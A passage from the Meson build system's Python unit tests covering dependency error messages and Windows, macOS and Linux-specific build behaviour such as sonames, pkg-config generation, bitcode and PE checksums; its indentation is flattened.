'''
dnf = "[Dd]ependency.*not found(:.*)?"
nopkg = '[Pp]kg-config.*not found'
def setUp(self):
super().setUp()
self.srcdir = os.path.realpath(tempfile.mkdtemp())
self.mbuild = os.path.join(self.srcdir, 'meson.build')
self.moptions = os.path.join(self.srcdir, 'meson_options.txt')
def tearDown(self):
super().tearDown()
windows_proof_rmtree(self.srcdir)
def assertMesonRaises(self, contents, match, *,
extra_args=None,
langs=None,
meson_version=None,
options=None,
override_envvars=None):
'''
Assert that running meson configure on the specified @contents raises
a error message matching regex @match.
'''
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('failure test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
if options is not None:
with open(self.moptions, 'w') as f:
f.write(options)
o = {'MESON_FORCE_BACKTRACE': '1'}
if override_envvars is None:
override_envvars = o
else:
override_envvars.update(o)
# Force tracebacks so we can detect them properly
with self.assertRaisesRegex(MesonException, match, msg=contents):
# Must run in-process or we'll get a generic CalledProcessError
self.init(self.srcdir, extra_args=extra_args,
inprocess=True,
override_envvars = override_envvars)
def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('output test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
# Run in-process for speed and consistency with assertMesonRaises
return self.init(self.srcdir, extra_args=extra_args, inprocess=True)
def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents outputs
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertRegex(out, match)
def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents does not output
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertNotRegex(out, match)
@skipIfNoPkgconfig
def test_dependency(self):
if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
raise unittest.SkipTest('zlib not found with pkg-config')
a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
("dependency('zlib', version : 1)", "[Vv]ersion.*string or list"),
("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
("dependency('zlibfail')", self.dnf),)
for contents, match in a:
self.assertMesonRaises(contents, match)
def test_apple_frameworks_dependency(self):
if not is_osx():
raise unittest.SkipTest('only run on macOS')
self.assertMesonRaises("dependency('appleframeworks')",
"requires at least one module")
def test_extraframework_dependency_method(self):
code = "dependency('python', method : 'extraframework')"
if not is_osx():
self.assertMesonRaises(code, self.dnf)
else:
# Python2 framework is always available on macOS
self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')
def test_sdl2_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('sdl2-config'):
raise unittest.SkipTest('sdl2-config found')
self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
if shutil.which('pkg-config'):
self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
with no_pkgconfig():
# Look for pkg-config, cache it, then
# Use cached pkg-config without erroring out, then
# Use cached pkg-config to error out
code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
"dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
"dependency('sdl2', method : 'pkg-config')"
self.assertMesonRaises(code, self.nopkg)
def test_gnustep_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('gnustep-config'):
raise unittest.SkipTest('gnustep-config found')
self.assertMesonRaises("dependency('gnustep')",
"(requires a Objc compiler|{})".format(self.dnf),
langs = ['objc'])
def test_wx_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
self.assertMesonOutputs("dependency('wxwidgets', required : false)",
"Run-time dependency .*WxWidgets.* found: .*NO.*")
def test_wx_dependency(self):
if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
"module argument is not a string")
def test_llvm_dependency(self):
self.assertMesonRaises("dependency('llvm', modules : 'fail')",
"(required.*fail|{})".format(self.dnf))
def test_boost_notfound_dependency(self):
# Can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost', modules : 1)",
"module.*not a string")
self.assertMesonRaises("dependency('boost', modules : 'fail')",
"(fail.*not found|{})".format(self.dnf))
def test_boost_BOOST_ROOT_dependency(self):
# Test BOOST_ROOT; can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost')",
"(BOOST_ROOT.*absolute|{})".format(self.dnf),
override_envvars = {'BOOST_ROOT': 'relative/path'})
def test_dependency_invalid_method(self):
code = '''zlib_dep = dependency('zlib', required : false)
zlib_dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, ".* is not a config-tool dependency")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_pkgconfig_variable('foo')
'''
self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")
def test_objc_cpp_detection(self):
'''
Test that when we can't detect objc or objcpp, we fail gracefully.
'''
env = get_fake_env()
try:
env.detect_objc_compiler(MachineChoice.HOST)
env.detect_objcpp_compiler(MachineChoice.HOST)
except EnvironmentException:
code = "add_languages('objc')\nadd_languages('objcpp')"
self.assertMesonRaises(code, "Unknown compiler")
return
raise unittest.SkipTest("objc and objcpp found, can't test detection failure")
def test_subproject_variables(self):
'''
Test that:
1. The correct message is outputted when a not-required dep is not
found and the fallback subproject is also not found.
2. A not-required fallback dependency is not found because the
subproject failed to parse.
3. A not-found not-required dep with a fallback subproject outputs the
correct message when the fallback subproject is found but the
variable inside it is not.
4. A fallback dependency is found from the subproject parsed in (3)
5. The correct message is outputted when the .wrap file is missing for
a sub-subproject.
'''
tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
out = self.init(tdir, inprocess=True)
self.assertRegex(out, r"Subproject directory not found and .*nosubproj.wrap.* file not found")
self.assertRegex(out, r'Function does not take positional arguments.')
self.assertRegex(out, r'WARNING:.* Dependency .*subsubproject.* not found but it is available in a sub-subproject.')
self.assertRegex(out, r'Subproject directory not found and .*subsubproject.wrap.* file not found')
self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
def test_exception_exit_status(self):
'''
Test exit status on python exception
'''
tdir = os.path.join(self.unit_test_dir, '21 exit status')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
self.assertEqual(cm.exception.returncode, 2)
self.wipe()
def test_dict_requires_key_value_pairs(self):
self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
'Only key:value pairs are valid in dict construction.')
self.assertMesonRaises("{'foo': 'bar', 3}",
'Only key:value pairs are valid in dict construction.')
def test_dict_forbids_duplicate_keys(self):
self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
'Duplicate dictionary key: a.*')
def test_dict_forbids_integer_key(self):
self.assertMesonRaises("dict = {3: 'foo'}",
'Key must be a string.*')
def test_using_too_recent_feature(self):
# Here we use a dict, which was introduced in 0.47.0
self.assertMesonOutputs("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.46.0')
def test_using_recent_feature(self):
# Same as above, except the meson version is now appropriate
self.assertMesonDoesNotOutput("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.47')
def test_using_too_recent_feature_dependency(self):
self.assertMesonOutputs("dependency('pcap', required: false)",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.41.0')
def test_vcs_tag_featurenew_build_always_stale(self):
'https://github.com/mesonbuild/meson/issues/3904'
vcs_tag = '''version_data = configuration_data()
version_data.set('PROJVER', '@VCS_TAG@')
vf = configure_file(output : 'version.h.in', configuration: version_data)
f = vcs_tag(input : vf, output : 'version.h')
'''
msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')
def test_missing_subproject_not_required_and_required(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub2 = subproject('not-found-subproject', required: true)",
""".*Subproject "subprojects/not-found-subproject" required but not found.*""")
def test_get_variable_on_not_found_project(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub1.get_variable('naaa')",
"""Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")
def test_version_checked_before_parsing_options(self):
'''
https://github.com/mesonbuild/meson/issues/5281
'''
options = "option('some-option', type: 'foo', value: '')"
match = 'Meson version is.*but project requires >=2000'
self.assertMesonRaises("", match, meson_version='>=2000', options=options)
def test_assert_default_message(self):
self.assertMesonRaises("k1 = 'a'\n" +
"assert({\n" +
" k1: 1,\n" +
"}['a'] == 2)\n",
r"Assert failed: {k1 : 1}\['a'\] == 2")
def test_wrap_nofallback(self):
self.assertMesonRaises("dependency('notfound', fallback : ['foo', 'foo_dep'])",
r"Dependency \'notfound\' not found and fallback is disabled",
extra_args=['--wrap-mode=nofallback'])
def test_message(self):
self.assertMesonOutputs("message('Array:', ['a', 'b'])",
r"Message:.* Array: \['a', 'b'\]")
def test_warning(self):
self.assertMesonOutputs("warning('Array:', ['a', 'b'])",
r"WARNING:.* Array: \['a', 'b'\]")
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
'''
Tests that should run on Cygwin, MinGW, and MSVC
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
@unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
def test_find_program(self):
'''
Test that Windows-specific edge-cases in find_program are functioning
correctly. Cannot be an ordinary test because it involves manipulating
PATH to point to a directory with Python scripts.
'''
testdir = os.path.join(self.platform_test_dir, '8 find program')
# Find `cmd` and `cmd.exe`
prog1 = ExternalProgram('cmd')
self.assertTrue(prog1.found(), msg='cmd not found')
prog2 = ExternalProgram('cmd.exe')
self.assertTrue(prog2.found(), msg='cmd.exe not found')
self.assertPathEqual(prog1.get_path(), prog2.get_path())
# Find cmd with an absolute path that's missing the extension
cmd_path = prog2.get_path()[:-4]
prog = ExternalProgram(cmd_path)
self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path))
# Finding a script with no extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script'))
self.assertTrue(prog.found(), msg='test-script not found')
# Finding a script with an extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
self.assertTrue(prog.found(), msg='test-script-ext.py not found')
# Finding a script in PATH
os.environ['PATH'] += os.pathsep + testdir
# Finding a script in PATH w/o extension works and adds the interpreter
# (check only if `.PY` is in PATHEXT)
if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
prog = ExternalProgram('test-script-ext')
self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Finding a script in PATH with extension works and adds the interpreter
prog = ExternalProgram('test-script-ext.py')
self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Ensure that WindowsApps gets removed from PATH
path = os.environ['PATH']
if 'WindowsApps' not in path:
username = os.environ['USERNAME']
appstore_dir = r'C:\Users\{}\AppData\Local\Microsoft\WindowsApps'.format(username)
path = os.pathsep + appstore_dir
path = ExternalProgram._windows_sanitize_path(path)
self.assertNotIn('WindowsApps', path)
def test_ignore_libs(self):
'''
Test that find_library on libs that are to be ignored returns an empty
array of arguments. Must be a unit test because we cannot inspect
ExternalLibraryHolder from build files.
'''
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Not using MSVC')
# To force people to update this test, and also test
self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
for l in cc.ignore_libs:
self.assertEqual(cc.find_library(l, env, []), [])
def test_rc_depends_files(self):
testdir = os.path.join(self.platform_test_dir, '5 resources')
# resource compiler depfile generation is not yet implemented for msvc
env = get_fake_env(testdir, self.builddir, self.prefix)
depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Test compile_resources(depend_file:)
# Changing mtime of sample.ico should rebuild prog
self.utime(os.path.join(testdir, 'res', 'sample.ico'))
self.assertRebuiltTarget('prog')
# Test depfile generation by compile_resources
# Changing mtime of resource.h should rebuild myres.rc and then prog
if depfile_works:
self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
self.assertRebuiltTarget('prog')
self.wipe()
if depfile_works:
testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
self.utime(os.path.join(testdir, 'res', 'resource.h'))
self.assertRebuiltTarget('prog_1')
def test_msvc_cpp17(self):
testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
try:
self.init(testdir)
except subprocess.CalledProcessError:
# According to Python docs, output is only stored when
# using check_output. We don't use it, so we can't check
# that the output is correct (i.e. that it failed due
# to the right reason).
return
self.build()
def test_install_pdb_introspection(self):
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
self.init(testdir)
installed = self.introspect('--installed')
files = [os.path.basename(path) for path in installed.values()]
self.assertTrue('prog.pdb' in files)
def _check_ld(self, name: str, lang: str, expected: str) -> None:
if not shutil.which(name):
raise unittest.SkipTest('Could not find {}.'.format(name))
envvar = mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
try:
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('Could not find a compiler for {}'.format(lang))
self.assertEqual(comp.linker.id, expected)
def test_link_environment_variable_lld_link(self):
self._check_ld('lld-link', 'c', 'lld-link')
def test_link_environment_variable_link(self):
self._check_ld('link', 'c', 'link')
def test_link_environment_variable_optlink(self):
self._check_ld('optlink', 'c', 'optlink')
def test_link_environment_variable_rust(self):
self._check_ld('link', 'rust', 'link')
def test_pefile_checksum(self):
try:
import pefile
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('pefile module not found')
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir)
self.build()
# Test that binaries have a non-zero checksum
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
cc_id = cc.get_id()
ld_id = cc.get_linker_id()
dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0]
exe = os.path.join(self.builddir, 'cppprog.exe')
for f in (dll, exe):
pe = pefile.PE(f)
msg = 'PE file: {!r}, compiler: {!r}, linker: {!r}'.format(f, cc_id, ld_id)
if cc_id == 'clang-cl':
# Latest clang-cl tested (7.0) does not write checksums out
self.assertFalse(pe.verify_checksum(), msg=msg)
else:
# Verify that a valid checksum was written by all other compilers
self.assertTrue(pe.verify_checksum(), msg=msg)
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
'''
Tests that should run on macOS
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')
def test_apple_bitcode(self):
'''
Test that -fembed-bitcode is correctly added while compiling and
-bitcode_bundle is added while linking when b_bitcode is true and not
when it is false. This can't be an ordinary test case because we need
to inspect the compiler database.
'''
testdir = os.path.join(self.platform_test_dir, '7 bitcode')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.id != 'clang':
raise unittest.SkipTest('Not using Clang on OSX')
# Try with bitcode enabled
out = self.init(testdir, extra_args='-Db_bitcode=true')
# Warning was printed
self.assertRegex(out, 'WARNING:.*b_bitcode')
# Compiler options were added
for compdb in self.get_compdb():
if 'module' in compdb['file']:
self.assertNotIn('-fembed-bitcode', compdb['command'])
else:
self.assertIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
# Linker options were added
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNotNone(m, msg=contents)
# Try with bitcode disabled
self.setconf('-Db_bitcode=false')
# Regenerate build
self.build()
for compdb in self.get_compdb():
self.assertNotIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNone(m, msg=contents)
def test_apple_bitcode_modules(self):
'''
Same as above, just for shared_module()
'''
testdir = os.path.join(self.common_test_dir, '152 shared module resolving symbol in executable')
# Ensure that it builds even with bitcode enabled
self.init(testdir, extra_args='-Db_bitcode=true')
self.build()
self.run_tests()
def _get_darwin_versions(self, fname):
fname = os.path.join(self.builddir, fname)
out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
self.assertIsNotNone(m, msg=out)
return m.groups()
@skipIfNoPkgconfig
def test_library_versioning(self):
'''
Ensure that compatibility_version and current_version are set correctly
'''
testdir = os.path.join(self.platform_test_dir, '2 library versions')
self.init(testdir)
self.build()
targets = {}
for t in self.introspect('--targets'):
targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))
def test_duplicate_rpath(self):
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
# We purposely pass a duplicate rpath to Meson, in order
# to ascertain that Meson does not call install_name_tool
# with duplicate -delete_rpath arguments, which would
# lead to erroring out on installation
env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
self.init(testdir, override_envvars=env)
self.build()
self.install()
@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
'''
Test that the soname is set correctly for shared libraries. This can't
be an ordinary test case because we need to run `readelf` and actually
check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '4 shared')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'libmylib.so')
soname = get_soname(lib1)
self.assertEqual(soname, 'libmylib.so')
def test_custom_soname(self):
'''
Test that the soname is set correctly for shared libraries when
a custom prefix and/or suffix is used. This can't be an ordinary test
case because we need to run `readelf` and actually check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '25 library versions')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
soname = get_soname(lib1)
self.assertEqual(soname, 'prefixsomelib.suffix')
def test_pic(self):
'''
Test that -fPIC is correctly added to static libraries when b_staticpic
is true and not when it is false. This can't be an ordinary test case
because we need to inspect the compiler database.
'''
if is_windows() or is_cygwin() or is_osx():
raise unittest.SkipTest('PIC not relevant')
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir)
compdb = self.get_compdb()
self.assertIn('-fPIC', compdb[0]['command'])
self.setconf('-Db_staticpic=false')
# Regenerate build
self.build()
compdb = self.get_compdb()
self.assertNotIn('-fPIC', compdb[0]['command'])
def test_pkgconfig_gen(self):
'''
Test that generated pkg-config files can be found and have the correct
version and link args. This can't be an ordinary test case because we
need to run pkg-config outside of a Meson build file.
https://github.com/mesonbuild/meson/issues/889
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
self.assertTrue(foo_dep.found())
self.assertEqual(foo_dep.get_version(), '1.0')
self.assertIn('-lfoo', foo_dep.get_link_args())
self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
def test_pkgconfig_gen_deps(self):
'''
Test that generated pkg-config files correctly handle dependencies
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir1 = self.privatedir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
privatedir2 = self.privatedir
os.environ
env = {
'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]),
'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib',
}
self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
# pkg-config strips some duplicated flags so we have to parse the
# generated file ourself.
expected = {
'Requires': 'libexposed',
'Requires.private': 'libfoo >= 1.0',
'Libs': '-L${libdir} -llibmain -pthread -lcustom',
'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
'Cflags': '-I${includedir} -pthread -DCUSTOM',
}
if is_osx() or is_haiku():
expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
matched_lines = 0
for line in f:
parts = line.split(':', 1)
if parts[0] in expected:
key = parts[0]
val = parts[1].strip()
expected_val = expected[key]
self.assertEqual(expected_val, val)
matched_lines += 1
self.assertEqual(len(expected), matched_lines)
cmd = ['pkg-config', 'requires-test']
out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'requires-private-test']
out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'pub-lib-order']
out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
self.assertEqual(out, ['-llibmain2', '-llibinternal'])
def test_pkg_unfound(self):
testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
self.init(testdir)
with open(os.path.join(self.privatedir, 'somename.pc')) as f:
pcfile = f.read()
self.assertFalse('blub_blob_blib' in pcfile)
def test_vala_c_warnings(self):
'''
Test that no warnings are emitted for C code generated by Vala. This
can't be an ordinary test case because we need to inspect the compiler
database.
https://github.com/mesonbuild/meson/issues/864
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '5 target glib')
self.init(testdir)
compdb = self.get_compdb()
vala_command = None
c_command = None
for each in compdb:
if each['file'].endswith('GLib.Thread.c'):
vala_command = each['command']
elif each['file'].endswith('GLib.Thread.vala'):
continue
elif each['file'].endswith('retcode.c'):
c_command = each['command']
else:
m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
raise AssertionError(m)
self.assertIsNotNone(vala_command)
self.assertIsNotNone(c_command)
# -w suppresses all warnings, should be there in Vala but not in C
self.assertIn(" -w ", vala_command)
self.assertNotIn(" -w ", c_command)
# -Wall enables all warnings, should be there in C but not in Vala
self.assertNotIn(" -Wall ", vala_command)
self.assertIn(" -Wall ", c_command)
# -Werror converts warnings to errors, should always be there since it's
# injected by an unrelated piece of code and the project has werror=true
self.assertIn(" -Werror ", vala_command)
self.assertIn(" -Werror ", c_command)
@skipIfNoPkgconfig
def test_qtdependency_pkgconfig_detection(self):
'''
Test that qt4 and qt5 detection with pkgconfig works.
'''
# Verify Qt4 or Qt5 can be found with pkg-config
qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=pkg-config'])
# Confirm that the dependency was found with pkg-config
mesonlog = self.get_meson_log()
if qt4 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n')
if qt5 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n')
@skip_if_not_base_option('b_sanitize')
def test_generate_gir_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
def test_qt5dependency_qmake_detection(self):
'''
Test that qt5 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt5
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n')
def _test_soname_impl(self, libpath, install):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
testdir = os.path.join(self.unit_test_dir, '1 soname')
self.init(testdir)
self.build()
if install:
self.install()
# File without aliases set.
nover = os.path.join(libpath, 'libnover.so')
self.assertPathExists(nover)
self.assertFalse(os.path.islink(nover))
self.assertEqual(get_soname(nover), 'libnover.so')
self.assertEqual(len(glob(nover[:-3] + '*')), 1)
# File with version set
verset = os.path.join(libpath, 'libverset.so')
self.assertPathExists(verset + '.4.5.6')
self.assertEqual(os.readlink(verset), 'libverset.so.4')
self.assertEqual(get_soname(verset), 'libverset.so.4')
self.assertEqual(len(glob(verset[:-3] + '*')), 3)
# File with soversion set
soverset = os.path.join(libpath, 'libsoverset.so')
self.assertPathExists(soverset + '.1.2.3')
self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(len(glob(soverset[:-3] + '*')), 2)
# File with version and soversion set to same values
settosame = os.path.join(libpath, 'libsettosame.so')
self.assertPathExists(settosame + '.7.8.9')
self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(len(glob(settosame[:-3] + '*')), 2)
# File with version and soversion set to different values
bothset = os.path.join(libpath, 'libbothset.so')
self.assertPathExists(bothset + '.1.2.3')
self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
